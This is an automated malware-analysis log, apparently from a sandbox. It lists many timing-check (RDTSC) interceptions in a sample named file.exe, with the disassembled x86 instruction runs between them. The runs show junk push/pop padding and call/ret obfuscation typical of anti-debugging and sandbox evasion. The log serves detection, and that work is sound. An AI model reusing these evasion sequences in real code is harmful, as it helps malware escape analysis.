Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9504 second address: ED9508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4E4 second address: EFC4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4E8 second address: EFC4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4F6 second address: EFC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4FA second address: EFC504 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC504 second address: EFC50E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC220745DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC50E second address: ED8A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jno 00007FC221A94B28h 0x0000000d call dword ptr [ebp+122D2688h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5AC second address: EFC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC220745E0Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5CF second address: EFC5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5D4 second address: EFC5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA2C second address: EFCA36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA36 second address: EFCA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA3A second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr [ebp+122D04E9h] 0x00000010 xor dx, 45BCh 0x00000015 mov ecx, dword ptr [ebp+122D2B4Ah] 0x0000001b call dword ptr [ebp+122D2819h] 0x00000021 pushad 0x00000022 jmp 00007FC221A94B37h 0x00000027 xor eax, eax 0x00000029 jmp 00007FC221A94B34h 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 stc 0x00000033 sub dword ptr [ebp+122D2F78h], edi 0x00000039 mov dword ptr [ebp+122D2B56h], eax 0x0000003f jmp 00007FC221A94B2Eh 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D19E9h], edi 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jno 00007FC221A94B2Ch 0x00000059 lodsw 0x0000005b pushad 0x0000005c jnl 00007FC221A94B2Ch 0x00000062 mov ecx, dword ptr [ebp+122D2B16h] 0x00000068 popad 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D1B69h], edx 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 clc 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jnp 00007FC221A94B3Eh 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCB0B second address: EFCB27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC220745DFCh 0x00000008 jne 00007FC220745DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push ebx 0x00000013 pushad 0x00000014 jng 00007FC220745DF6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCB27 second address: EFCB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FC221A94B2Bh 0x0000000f pop eax 0x00000010 and edx, dword ptr [ebp+122D2B7Ah] 0x00000016 push E680D4CBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jns 00007FC221A94B26h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCC8A second address: EFCC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC220745DF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCC9A second address: EFCCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD50A second address: EFD51F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FC220745DF8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD711 second address: EFD715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD715 second address: EFD778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC220745E03h 0x0000000e push edx 0x0000000f jmp 00007FC220745DFBh 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FC220745DF8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov edx, 6CBB1FD8h 0x00000035 lea eax, dword ptr [ebp+1247E294h] 0x0000003b jng 00007FC220745E01h 0x00000041 js 00007FC220745DFBh 0x00000047 adc dx, 4B63h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD778 second address: EFD77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD77C second address: EFD7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FC220745DFDh 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FC220745DF8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D1BE4h], ecx 0x00000031 lea eax, dword ptr [ebp+1247E250h] 0x00000037 add edx, dword ptr [ebp+122D251Ch] 0x0000003d nop 0x0000003e jo 00007FC220745DFEh 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD7D6 second address: ED94FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jnc 00007FC221A94B40h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FC221A94B28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov di, B41Dh 0x0000002b call dword ptr [ebp+122D27F4h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FC221A94B2Bh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38A15 second address: F38A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38A19 second address: F38A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnl 00007FC221A94B26h 0x00000013 jng 00007FC221A94B26h 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FC221A94B31h 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38B99 second address: F38BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFDh 0x00000009 jne 00007FC220745E08h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38D18 second address: F38D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3C552 second address: F3C558 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3C558 second address: F3C585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC221A94B32h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC221A94B26h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007FC221A94B3Ch 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3C585 second address: F3C593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB62D1 second address: EB62D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3E7A1 second address: F3E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3E7B1 second address: F3E7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jo 00007FC221A94B2Ch 0x0000000d jno 00007FC221A94B26h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FC221A94B26h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41B55 second address: F41B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41B59 second address: F41B78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41B78 second address: F41B99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC220745E07h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41B99 second address: F41BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41363 second address: F4136D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4136D second address: F41373 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41373 second address: F41394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E01h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC220745DF6h 0x0000000f jp 00007FC220745DF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F41394 second address: F4139A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4139A second address: F413E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC220745E06h 0x0000000f push edx 0x00000010 jmp 00007FC220745E00h 0x00000015 jmp 00007FC220745E05h 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4157A second address: F41590 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FC221A94B26h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC221A94B2Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F416E0 second address: F416E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F45CAB second address: F45CD5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B40h 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC221A94B26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F45CD5 second address: F45D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FC220745E01h 0x00000013 jmp 00007FC220745E01h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4592E second address: F45932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F45932 second address: F45936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F45936 second address: F45957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F45957 second address: F4595B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4595B second address: F459BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FC221A94B2Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jnc 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B2Ah 0x0000001e popad 0x0000001f jl 00007FC221A94B54h 0x00000025 jc 00007FC221A94B3Eh 0x0000002b jmp 00007FC221A94B36h 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 jnc 00007FC221A94B26h 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4748F second address: F474B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC220745DFBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC220745E01h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4B3C2 second address: F4B3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C9CD second address: F4C9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C9D3 second address: F4C9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C9D9 second address: F4C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F50DAA second address: F50DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FC221A94B30h 0x00000011 jmp 00007FC221A94B2Ah 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F50DD1 second address: F50DE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5106B second address: F51075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC221A94B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5130B second address: F5130F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5130F second address: F51319 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F51319 second address: F51329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC220745DFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F51329 second address: F5132F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5132F second address: F51334 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD15A second address: EFD1CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jne 00007FC221A94B26h 0x00000010 pop esi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 adc cx, 5E73h 0x0000001a push 00000004h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FC221A94B28h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov di, B7B8h 0x0000003a mov edx, dword ptr [ebp+122D2B46h] 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jns 00007FC221A94B3Bh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F515DA second address: F515DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F51F7F second address: F51F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F51F84 second address: F51F9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC220745E02h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F58D92 second address: F58DA0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F58DA0 second address: F58DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F58DA6 second address: F58DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F58DAA second address: F58DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F58DB8 second address: F58DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC221A94B30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F593E6 second address: F593EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F593EA second address: F59414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC221A94B26h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F59414 second address: F59439 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FC220745DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC220745E09h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F59439 second address: F5943F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5943F second address: F59443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F596D6 second address: F596DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F596DC second address: F596E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F59F10 second address: F59F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC221A94B26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC221A94B26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F59F25 second address: F59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F59F29 second address: F59F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jno 00007FC221A94B32h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F59F47 second address: F59F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5A528 second address: F5A53A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC221A94B2Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5A53A second address: F5A53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5AAEE second address: F5AAFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
